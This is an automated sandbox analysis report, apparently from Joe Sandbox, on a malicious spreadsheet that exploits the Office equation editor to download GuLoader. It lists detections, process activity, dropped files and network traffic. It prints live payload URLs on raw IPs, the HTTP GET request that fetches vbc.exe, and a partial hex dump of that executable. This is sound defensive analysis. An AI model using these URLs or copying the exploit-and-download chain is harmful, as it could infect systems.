Play interactive tour

Edit tour

Windows Analysis Report Inquiry Sheet.xlsx

Overview

General Information

Sample Name:	Inquiry Sheet.xlsx
Analysis ID:	482488
MD5:	b079763f132db9b4d979256a28909892
SHA1:	3f8ef9821671cbc8267baa2c6e9a41a18af45f78
SHA256:	71db7caab688d41a1c6bca4cafbf782d50a670a7c7e73ad3000dea754959cf2e
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to call native functions

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1296 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 1532 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2604 cmdline: 'C:\Users\Public\vbc.exe' MD5: B7E5ACDADE5630DBF1AB4B211DDC16DB)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://37.0.11.217/WEALTHYREM_ecI"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 212.192.246.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1532, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2604

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/WEALTHYREM_ecI"}

Multi AV Scanner detection for submitted file

Show sources

Source: Inquiry Sheet.xlsx

ReversingLabs: Detection: 26%

Antivirus detection for URL or domain

Show sources

Source: http://212.192.246.25/excel/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 17%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 17%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://37.0.11.217/WEALTHYREM_ecI

Source: Joe Sandbox View

ASN Name: RHC-HOSTINGGB RHC-HOSTINGGB

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 13 Sep 2021 18:16:54 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Sun, 12 Sep 2021 22:03:18 GMTETag: "22000-5cbd38416fb31"Accept-Ranges: bytesContent-Length: 139264Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 98 6b 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 01 00 00 90 00 00 00 00 00 00 bc 14 00 00 00 10 00 00 00 d0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 60 02 00 00 10 00 00 5c 62 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c8 01 00 28 00 00 00 00 20 02 00 3a 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 bd 01 00 00 10 00 00 00 c0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 58 45 00 00 00 d0 01 00 00 10 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3a 3b 00 00 00 20 02 00 00 40 00 00 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /excel/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25

Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: BEC4B86A.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC4B86A.emf

Jump to behavior

Source: global traffic

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00326928	6_2_00326928
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00323431	6_2_00323431
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A439	6_2_0032A439
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A42B	6_2_0032A42B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032441B	6_2_0032441B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032700F	6_2_0032700F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032247B	6_2_0032247B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00325063	6_2_00325063
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00320C67	6_2_00320C67
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00325C67	6_2_00325C67
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A467	6_2_0032A467
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032AC6F	6_2_0032AC6F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00323C6C	6_2_00323C6C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032B444	6_2_0032B444
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003244AC	6_2_003244AC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00323897	6_2_00323897
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032B498	6_2_0032B498
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00325885	6_2_00325885
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00329088	6_2_00329088
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003238E6	6_2_003238E6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032B4E4	6_2_0032B4E4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003270D8	6_2_003270D8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A92B	6_2_0032A92B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00320D2C	6_2_00320D2C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00326110	6_2_00326110
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032491E	6_2_0032491E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A51F	6_2_0032A51F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00321504	6_2_00321504
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00325508	6_2_00325508
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00329176	6_2_00329176
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00325967	6_2_00325967
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00325168	6_2_00325168
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032195B	6_2_0032195B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00329D5B	6_2_00329D5B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00325D58	6_2_00325D58
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00324548	6_2_00324548
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003211B3	6_2_003211B3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003215B7	6_2_003215B7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003271A4	6_2_003271A4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032559E	6_2_0032559E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00320D82	6_2_00320D82
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003229FE	6_2_003229FE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003255FE	6_2_003255FE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003245D0	6_2_003245D0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A5D1	6_2_0032A5D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003239C3	6_2_003239C3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003269C1	6_2_003269C1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00322A39	6_2_00322A39
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032B61F	6_2_0032B61F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00322E00	6_2_00322E00
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00320A79	6_2_00320A79
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00325260	6_2_00325260
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00325E65	6_2_00325E65
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00329A5E	6_2_00329A5E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032AA40	6_2_0032AA40
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00325A4A	6_2_00325A4A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032324A	6_2_0032324A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00321248	6_2_00321248
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00326649	6_2_00326649
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032164F	6_2_0032164F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A24C	6_2_0032A24C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003232A8	6_2_003232A8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003266AC	6_2_003266AC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A69A	6_2_0032A69A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00320A8A	6_2_00320A8A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032268D	6_2_0032268D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032B2F3	6_2_0032B2F3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00326EFC	6_2_00326EFC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003216E0	6_2_003216E0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003226E6	6_2_003226E6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003256D0	6_2_003256D0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A2D7	6_2_0032A2D7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00326EC1	6_2_00326EC1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00323AC8	6_2_00323AC8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00329B34	6_2_00329B34
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00326F39	6_2_00326F39
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032532A	6_2_0032532A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00325B77	6_2_00325B77
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032436B	6_2_0032436B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032B358	6_2_0032B358
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A341	6_2_0032A341
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00321347	6_2_00321347
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A3B8	6_2_0032A3B8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003237B9	6_2_003237B9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003233A2	6_2_003233A2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003237A0	6_2_003237A0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003257A6	6_2_003257A6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00324F91	6_2_00324F91
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032B39C	6_2_0032B39C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00323B83	6_2_00323B83
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00323BF7	6_2_00323BF7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00329BF4	6_2_00329BF4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003253F9	6_2_003253F9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003213ED	6_2_003213ED
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003217D0	6_2_003217D0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A7CC	6_2_0032A7CC

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00326928 NtAllocateVirtualMemory,	6_2_00326928
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003269C1 NtAllocateVirtualMemory,	6_2_003269C1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00326A91 NtAllocateVirtualMemory,	6_2_00326A91
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00326B75 NtAllocateVirtualMemory,	6_2_00326B75

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: Inquiry Sheet.xlsx

ReversingLabs: Detection: 26%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Inquiry Sheet.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE407.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/27@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402B34 push esi; retn 000Ch	6_2_00419669
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405C5A pushad ; iretd	6_2_00405C5B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407D62 push edi; iretd	6_2_00407D68
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408701 push esi; ret	6_2_00408702
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040631B push es; iretd	6_2_0040631F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00409134 push ebp; ret	6_2_0040915D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004089D5 push eax; ret	6_2_004089D6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405F90 push ds; retf	6_2_00405FD3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003242B8 pushad ; retf	6_2_0032433D

Source: initial sample	Static PE information: section name: .text entropy: 7.07203430098
Source: initial sample	Static PE information: section name: .text entropy: 7.07203430098

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

